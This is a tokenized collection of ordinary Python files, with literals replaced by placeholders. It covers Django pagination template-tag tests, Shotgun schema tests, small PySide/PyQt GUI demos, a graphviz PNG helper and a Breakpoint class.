assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT>' in schema ) <EOL> self . assertTrue ( '<STR_LIT>' in schema [ '<STR_LIT>' ] ) <EOL> schema = self . sg . schema_read ( project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT>' in schema ) <EOL> self . assertFalse ( '<STR_LIT>' in schema . keys ( ) ) <EOL> schema = self . sg . schema_field_read ( '<STR_LIT>' , project_entity = project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT:user>' in schema ) <EOL> self . assertTrue ( '<STR_LIT>' in schema [ '<STR_LIT:user>' ] ) <EOL> schema = self . sg . schema_field_read ( '<STR_LIT>' , '<STR_LIT:user>' , project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT:user>' in schema ) <EOL> self . assertTrue ( '<STR_LIT>' in schema [ '<STR_LIT:user>' ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> base . unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import string <EOL> import sys <EOL> import xml . etree . ElementTree as etree <EOL> from django . template import ( <EOL> Context , <EOL> Template , <EOL> TemplateSyntaxError , <EOL> ) <EOL> from django . test import TestCase <EOL> from django . test . client import RequestFactory <EOL> from django . utils import unittest <EOL> from el_pagination . exceptions import PaginationError <EOL> from el_pagination . models import PageList <EOL> from el_pagination . settings import ( <EOL> PAGE_LABEL , <EOL> PER_PAGE , <EOL> ) <EOL> from el_pagination . tests import make_model_instances <EOL> skip_if_old_etree = unittest . skipIf ( <EOL> sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) , '<STR_LIT>' ) <EOL> class TemplateTagsTestMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . factory = RequestFactory ( ) <EOL> def render ( self , request , contents , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> template = Template ( '<STR_LIT>' + contents ) <EOL> context_data = kwargs . copy ( ) if kwargs else { '<STR_LIT>' : range ( <NUM_LIT> ) } <EOL> context_data [ '<STR_LIT>' ] = request <EOL> context = Context ( context_data ) <EOL> html = template . render ( context ) <EOL> return html . strip ( ) , context <EOL> def request ( self , url = '<STR_LIT:/>' , page = None , data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> querydict = { } if data is None else data <EOL> querydict . update ( kwargs ) <EOL> if page is not None : <EOL> querydict [ PAGE_LABEL ] = page <EOL> return self . factory . get ( url , querydict ) <EOL> class EtreeTemplateTagsTestMixin ( TemplateTagsTestMixin ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , request , contents , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> html , _ = super ( EtreeTemplateTagsTestMixin , self ) . render ( <EOL> request , contents , ** kwargs ) <EOL> if html : <EOL> return etree . fromstring ( '<STR_LIT>' . 
format ( html ) ) <EOL> class PaginateTestMixin ( TemplateTagsTestMixin ) : <EOL> """<STR_LIT>""" <EOL> def assertPaginationNumQueries ( self , num_queries , template , queryset = None ) : <EOL> """<STR_LIT>""" <EOL> if queryset is None : <EOL> queryset = make_model_instances ( <NUM_LIT> ) <EOL> request = self . request ( ) <EOL> with self . assertNumQueries ( num_queries ) : <EOL> _ , context = self . render ( request , template , objects = queryset ) <EOL> objects = list ( context [ '<STR_LIT>' ] ) <EOL> return objects <EOL> def assertRangeEqual ( self , expected , actual ) : <EOL> """<STR_LIT>""" <EOL> self . assertListEqual ( list ( expected ) , list ( actual ) ) <EOL> def render ( self , request , contents , ** kwargs ) : <EOL> text = string . Template ( contents ) . substitute ( tagname = self . tagname ) <EOL> return super ( PaginateTestMixin , self ) . render ( request , text , ** kwargs ) <EOL> def test_object_list ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( PER_PAGE ) , context [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , html ) <EOL> def test_per_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> ) , context [ '<STR_LIT>' ] ) <EOL> def test_per_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , per_page = <NUM_LIT:5> ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> ) , context [ '<STR_LIT>' ] ) <EOL> def test_first_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> ) , context [ '<STR_LIT>' ] ) <EOL> _ , context = self . render ( self . 
request ( page = <NUM_LIT:2> ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> def test_first_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> context_data = { <EOL> '<STR_LIT>' : range ( <NUM_LIT> ) , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> _ , context = self . render ( self . request ( ) , template , ** context_data ) <EOL> self . assertSequenceEqual ( [ <NUM_LIT:0> ] , context [ '<STR_LIT>' ] ) <EOL> _ , context = self . render ( <EOL> self . request ( page = <NUM_LIT:2> ) , template , ** context_data ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:1> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , mypage = <NUM_LIT:2> ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> , <NUM_LIT:20> ) , context [ '<STR_LIT>' ] ) <EOL> def test_using_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( data = { '<STR_LIT>' : <NUM_LIT:2> } ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_using_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( p = <NUM_LIT:3> ) , template , entries = range ( <NUM_LIT> ) , qskey = '<STR_LIT:p>' ) <EOL> self . 
assertRangeEqual ( range ( <NUM_LIT> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_with_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( '<STR_LIT>' , context [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def test_with_argument_as_variable ( self ) : <EOL> path = '<STR_LIT>' <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , path = path ) <EOL> self . assertEqual ( path , context [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def test_as_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> ) , context [ '<STR_LIT>' ] ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_complete_argument_list ( self ) : <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , mypage = '<STR_LIT>' , <EOL> path = '<STR_LIT>' ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> , <NUM_LIT:15> ) , context [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , context [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def test_invalid_arguments ( self ) : <EOL> templates = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> request = self . request ( ) <EOL> for template in templates : <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) <EOL> def test_invalid_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( page = <NUM_LIT:0> ) , template ) <EOL> self . 
assertRangeEqual ( range ( <NUM_LIT:5> ) , context [ '<STR_LIT>' ] ) <EOL> def test_nested_context_variable ( self ) : <EOL> manager = { '<STR_LIT:all>' : range ( <NUM_LIT> ) } <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template , manager = manager ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> ) , context [ '<STR_LIT>' ] ) <EOL> def test_failing_nested_context_variable ( self ) : <EOL> manager = { '<STR_LIT:all>' : range ( <NUM_LIT> ) } <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( TemplateSyntaxError ) as cm : <EOL> self . render ( self . request ( ) , template , manager = manager ) <EOL> self . assertIn ( '<STR_LIT>' , str ( cm . exception ) ) <EOL> def test_multiple_pagination ( self ) : <EOL> letters = string . ascii_letters <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> _ , context = self . render ( <EOL> self . request ( page = <NUM_LIT:2> , entries = <NUM_LIT:3> ) , template , <EOL> objects = range ( <NUM_LIT> ) , entries = { '<STR_LIT:all>' : letters } , <EOL> items = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] , items_page = '<STR_LIT:p>' ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> self . assertSequenceEqual ( [ '<STR_LIT:foo>' ] , context [ '<STR_LIT>' ] ) <EOL> self . assertSequenceEqual ( letters [ <NUM_LIT:10> : <NUM_LIT:15> ] , context [ '<STR_LIT>' ] ) <EOL> self . assertSequenceEqual ( letters , context [ '<STR_LIT>' ] [ '<STR_LIT:all>' ] ) <EOL> class PaginateTest ( PaginateTestMixin , TestCase ) : <EOL> tagname = '<STR_LIT>' <EOL> def test_starting_from_last_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_negative_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . 
render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_negative_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , mypage = - <NUM_LIT:2> ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:30> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_negative_page_out_of_range ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> ) , context [ '<STR_LIT>' ] ) <EOL> def test_num_queries ( self ) : <EOL> template = '<STR_LIT>' <EOL> objects = self . assertPaginationNumQueries ( <NUM_LIT:2> , template ) <EOL> self . assertEqual ( <NUM_LIT:10> , len ( objects ) ) <EOL> def test_num_queries_starting_from_another_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> self . assertPaginationNumQueries ( <NUM_LIT:2> , template ) <EOL> def test_num_queries_starting_from_last_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> self . assertPaginationNumQueries ( <NUM_LIT:2> , template ) <EOL> class LazyPaginateTest ( PaginateTestMixin , TestCase ) : <EOL> tagname = '<STR_LIT>' <EOL> def test_starting_from_negative_page_raises_error ( self ) : <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( NotImplementedError ) : <EOL> self . render ( self . request ( ) , template ) <EOL> def test_num_queries ( self ) : <EOL> template = '<STR_LIT>' <EOL> objects = self . assertPaginationNumQueries ( <NUM_LIT:1> , template ) <EOL> self . assertEqual ( <NUM_LIT:10> , len ( objects ) ) <EOL> def test_num_queries_starting_from_another_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> self . 
assertPaginationNumQueries ( <NUM_LIT:1> , template ) <EOL> @ skip_if_old_etree <EOL> class ShowMoreTest ( EtreeTemplateTagsTestMixin , TestCase ) : <EOL> def test_first_page_next_url ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( ) , template ) <EOL> link = tree . find ( '<STR_LIT>' ) <EOL> expected = '<STR_LIT>' . format ( PAGE_LABEL , <NUM_LIT:2> ) <EOL> self . assertEqual ( expected , link . attrib [ '<STR_LIT>' ] ) <EOL> def test_page_next_url ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( page = <NUM_LIT:3> ) , template ) <EOL> link = tree . find ( '<STR_LIT>' ) <EOL> expected = '<STR_LIT>' . format ( PAGE_LABEL , <NUM_LIT:4> ) <EOL> self . assertEqual ( expected , link . attrib [ '<STR_LIT>' ] ) <EOL> def test_last_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( page = <NUM_LIT:2> ) , template ) <EOL> self . assertIsNone ( tree ) <EOL> def test_customized_label ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( ) , template ) <EOL> link = tree . find ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , link . text ) <EOL> def test_customized_loading ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( ) , template ) <EOL> loading = tree . find ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , loading . text ) <EOL> class GetPagesTest ( TemplateTagsTestMixin , TestCase ) : <EOL> def test_page_list ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( '<STR_LIT>' , html ) <EOL> self . assertIn ( '<STR_LIT>' , context ) <EOL> self . assertIsInstance ( context [ '<STR_LIT>' ] , PageList ) <EOL> def test_different_varname ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . 
assertIn ( '<STR_LIT>' , context ) <EOL> self . assertIsInstance ( context [ '<STR_LIT>' ] , PageList ) <EOL> def test_page_numbers ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> _ , context = self . render ( self . request ( page = page_number ) , template ) <EOL> page = context [ '<STR_LIT>' ] . current ( ) <EOL> self . assertEqual ( page_number , page . number ) <EOL> def test_without_paginate_tag ( self ) : <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( PaginationError ) : <EOL> self . render ( self . request ( ) , template ) <EOL> def test_invalid_arguments ( self ) : <EOL> template = '<STR_LIT>' <EOL> request = self . request ( ) <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) <EOL> def test_starting_from_negative_page_in_another_page ( self ) : <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , page = <NUM_LIT:1> ) <EOL> page = context [ '<STR_LIT>' ] . last ( ) <EOL> self . assertEqual ( '<STR_LIT>' , page . url ) <EOL> def test_pages_length ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( '<STR_LIT:5>' , html ) <EOL> @ skip_if_old_etree <EOL> class ShowPagesTest ( EtreeTemplateTagsTestMixin , TestCase ) : <EOL> def test_current_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> tree = self . render ( self . request ( page = page_number ) , template ) <EOL> current = tree . find ( '<STR_LIT>' ) <EOL> text = '<STR_LIT>' . join ( element . text for element in current ) <EOL> self . assertEqual ( str ( page_number ) , text ) <EOL> def test_links ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> tree = self . 
render ( self . request ( page = page_number ) , template ) <EOL> links = tree . findall ( '<STR_LIT>' ) <EOL> expected = <NUM_LIT:5> if page_number == <NUM_LIT:1> or page_number == <NUM_LIT:5> else <NUM_LIT:6> <EOL> self . assertEqual ( expected , len ( links ) ) <EOL> def test_without_paginate_tag ( self ) : <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( PaginationError ) : <EOL> self . render ( self . request ( ) , template ) <EOL> def test_invalid_arguments ( self ) : <EOL> template = '<STR_LIT>' <EOL> request = self . request ( ) <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) <EOL> class ShowCurrentNumberTest ( TemplateTagsTestMixin , TestCase ) : <EOL> def test_current_number ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> html , _ = self . render ( self . request ( page = page_number ) , template ) <EOL> self . assertEqual ( page_number , int ( html ) ) <EOL> def test_starting_from_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( <NUM_LIT:3> , int ( html ) ) <EOL> def test_starting_from_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , mypage = <NUM_LIT:2> ) <EOL> self . assertEqual ( <NUM_LIT:2> , int ( html ) ) <EOL> def test_using_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( <EOL> self . request ( mypage = <NUM_LIT:2> ) , template ) <EOL> self . assertEqual ( <NUM_LIT:2> , int ( html ) ) <EOL> def test_using_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( <EOL> self . request ( p = <NUM_LIT:5> ) , template , entries = range ( <NUM_LIT> ) , qskey = '<STR_LIT:p>' ) <EOL> self . 
assertEqual ( <NUM_LIT:5> , int ( html ) ) <EOL> def test_as_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( page = <NUM_LIT:4> ) , template ) <EOL> self . assertEqual ( '<STR_LIT>' , html ) <EOL> self . assertIn ( '<STR_LIT>' , context ) <EOL> self . assertEqual ( <NUM_LIT:4> , context [ '<STR_LIT>' ] ) <EOL> def test_complete_argument_list ( self ) : <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> html , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , mypage = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , context [ '<STR_LIT>' ] ) <EOL> def test_invalid_arguments ( self ) : <EOL> templates = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> request = self . request ( ) <EOL> for template in templates : <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> try : <EOL> from PySide import QtCore <EOL> from PySide import QtGui <EOL> except ImportError : <EOL> from PyQt4 import QtCore <EOL> from PyQt4 import QtGui <EOL> default_settings = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> } <EOL> class CustomDlg ( QtGui . QDialog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent , settings ) : <EOL> super ( CustomDlg , self ) . __init__ ( parent ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . _settings = settings <EOL> self . setModal ( True ) <EOL> def keyPressEvent ( self , evt ) : <EOL> close_win_cmd_w = ( evt . key ( ) == QtCore . Qt . Key_W and evt . modifiers ( ) == QtCore . Qt . ControlModifier ) <EOL> close_win_esc = ( evt . key ( ) == QtCore . Qt . Key_Escape ) <EOL> if close_win_cmd_w or close_win_esc : <EOL> self . close ( ) <EOL> return self . _settings <EOL> def get_inputs ( self ) : <EOL> return self . _settings <EOL> @ staticmethod <EOL> def popup_and_get_inputs ( parent , settings ) : <EOL> dlg = CustomDlg ( parent , settings ) <EOL> dlg . show ( ) <EOL> dlg . exec_ ( ) <EOL> class QuitConfirmDlg ( CustomDlg ) : <EOL> def __init__ ( self , parent , settings ) : <EOL> super ( QuitConfirmDlg , self ) . __init__ ( parent , settings ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . tips_label = QtGui . QLabel ( "<STR_LIT>" , self ) <EOL> self . tips_label . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> ) ) <EOL> self . minimize_rbtn = QtGui . QRadioButton ( "<STR_LIT>" , self ) <EOL> self . minimize_rbtn . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> self . exit_rbtn = QtGui . QRadioButton ( "<STR_LIT>" , self ) <EOL> self . exit_rbtn . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> self . no_confirm_cbox = QtGui . QCheckBox ( "<STR_LIT>" , self ) <EOL> self . no_confirm_cbox . 
setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> self . minimize_rbtn . setChecked ( not self . _settings [ '<STR_LIT>' ] ) <EOL> self . exit_rbtn . setChecked ( self . _settings [ '<STR_LIT>' ] ) <EOL> self . no_confirm_cbox . setChecked ( not self . _settings [ '<STR_LIT>' ] ) <EOL> def get_inputs ( self ) : <EOL> self . _settings [ "<STR_LIT>" ] = self . exit_rbtn . isChecked ( ) <EOL> self . _settings [ "<STR_LIT>" ] = not self . no_confirm_cbox . isChecked ( ) <EOL> return self . _settings <EOL> @ staticmethod <EOL> def popup_and_get_inputs ( parent , settings ) : <EOL> dlg = QuitConfirmDlg ( parent , settings ) <EOL> dlg . show ( ) <EOL> dlg . exec_ ( ) <EOL> return dlg . get_inputs ( ) <EOL> class Demo ( QtGui . QWidget ) : <EOL> def __init__ ( self ) : <EOL> super ( Demo , self ) . __init__ ( ) <EOL> x , y , w , h = <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> , <NUM_LIT> <EOL> self . setGeometry ( x , y , w , h ) <EOL> self . settings_btn = QtGui . QPushButton ( "<STR_LIT>" , self ) <EOL> self . settings_btn . clicked . connect ( self . _settings_btn_clicked ) <EOL> def _settings_btn_clicked ( self ) : <EOL> global default_settings <EOL> settings = default_settings <EOL> default_settings = QuitConfirmDlg . popup_and_get_inputs ( self , settings ) <EOL> print "<STR_LIT>" , default_settings <EOL> def show_and_raise ( self ) : <EOL> self . show ( ) <EOL> self . raise_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> demo = Demo ( ) <EOL> demo . show_and_raise ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> try : <EOL> from PySide import QtCore <EOL> from PySide import QtGui <EOL> except ImportError : <EOL> from PyQt4 import QtCore <EOL> from PyQt4 import QtGui <EOL> def config_theme_path ( ) : <EOL> if sys . platform != "<STR_LIT>" : <EOL> return <EOL> theme_name = str ( QtGui . QIcon . themeName ( ) ) <EOL> if theme_name != "<STR_LIT>" : <EOL> QtGui . QIcon . setThemeName ( "<STR_LIT>" ) <EOL> search_paths = list ( QtGui . QIcon . themeSearchPaths ( ) ) <EOL> custom_path = "<STR_LIT>" <EOL> if custom_path not in search_paths : <EOL> search_paths . append ( custom_path ) <EOL> QtGui . QIcon . setThemeSearchPaths ( search_paths ) <EOL> class Demo ( QtGui . QMainWindow ) : <EOL> def __init__ ( self ) : <EOL> super ( Demo , self ) . __init__ ( ) <EOL> x , y , w , h = <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> , <NUM_LIT> <EOL> self . setGeometry ( x , y , w , h ) <EOL> self . setUnifiedTitleAndToolBarOnMac ( True ) <EOL> config_theme_path ( ) <EOL> icon = QtGui . QIcon . fromTheme ( '<STR_LIT>' ) <EOL> exit_a = QtGui . QAction ( icon , '<STR_LIT>' , self ) <EOL> exit_a . setShortcut ( '<STR_LIT>' ) <EOL> exit_a . triggered . connect ( self . close ) <EOL> toolbar = self . addToolBar ( '<STR_LIT>' ) <EOL> toolbar . addAction ( exit_a ) <EOL> self . _toolbar = toolbar <EOL> def show_and_raise ( self ) : <EOL> self . show ( ) <EOL> self . raise_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> demo = Demo ( ) <EOL> demo . show_and_raise ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from PySide import QtGui <EOL> fmts = [ str ( i ) for i in QtGui . QImageReader . supportedImageFormats ( ) ] <EOL> print fmts </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import time <EOL> import threading <EOL> try : <EOL> from PySide import QtCore <EOL> from PySide import QtGui <EOL> except ImportError : <EOL> from PyQt4 import QtCore <EOL> from PyQt4 import QtGui <EOL> class Demo ( QtGui . QWidget ) : <EOL> def __init__ ( self ) : <EOL> super ( Demo , self ) . __init__ ( ) <EOL> x , y , w , h = <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> , <NUM_LIT> <EOL> self . setGeometry ( x , y , w , h ) <EOL> def foo ( ) : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> QtGui . QApplication . alert ( self ) <EOL> t = threading . Thread ( target = foo ) <EOL> t . start ( ) <EOL> def show_and_raise ( self ) : <EOL> self . show ( ) <EOL> self . raise_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> demo = Demo ( ) <EOL> demo . show_and_raise ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import pygraphviz <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> def dot_text2png ( text , png_path , prog = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> text = text . strip ( ) <EOL> filename = str ( hash ( text ) ) . replace ( "<STR_LIT:->" , "<STR_LIT>" ) <EOL> fullname = filename + "<STR_LIT>" <EOL> if os . path . isdir ( png_path ) : <EOL> save_to_prefix = png_path <EOL> else : <EOL> save_to_prefix = os . path . dirname ( png_path ) <EOL> png_path = os . path . join ( save_to_prefix , fullname ) <EOL> if os . path . exists ( png_path ) : <EOL> return png_path <EOL> g = pygraphviz . AGraph ( text ) <EOL> g . layout ( prog = prog ) <EOL> g . draw ( png_path ) <EOL> return png_path <EOL> def dot_file2png ( dot_path , png_path ) : <EOL> """<STR_LIT>""" <EOL> text = file ( dot_path ) . read ( ) <EOL> return dot_text2png ( text = text , png_path = png_path ) <EOL> test_text = """<STR_LIT>""" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> save_to_prefix = "<STR_LIT>" <EOL> if not os . path . exists ( save_to_prefix ) : <EOL> os . makedirs ( save_to_prefix ) <EOL> png_path = save_to_prefix <EOL> png_path = "<STR_LIT>" <EOL> dst_path = dot_text2png ( test_text , png_path ) <EOL> msg = "<STR_LIT>" + dst_path <EOL> print msg </s>
<s> class Breakpoint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file_name , line_number , condition ) : <EOL> super ( Breakpoint , self ) . __init__ ( ) <EOL> self . file_name = file_name <EOL> self . line_number = line_number <EOL> self . condition = condition </s>
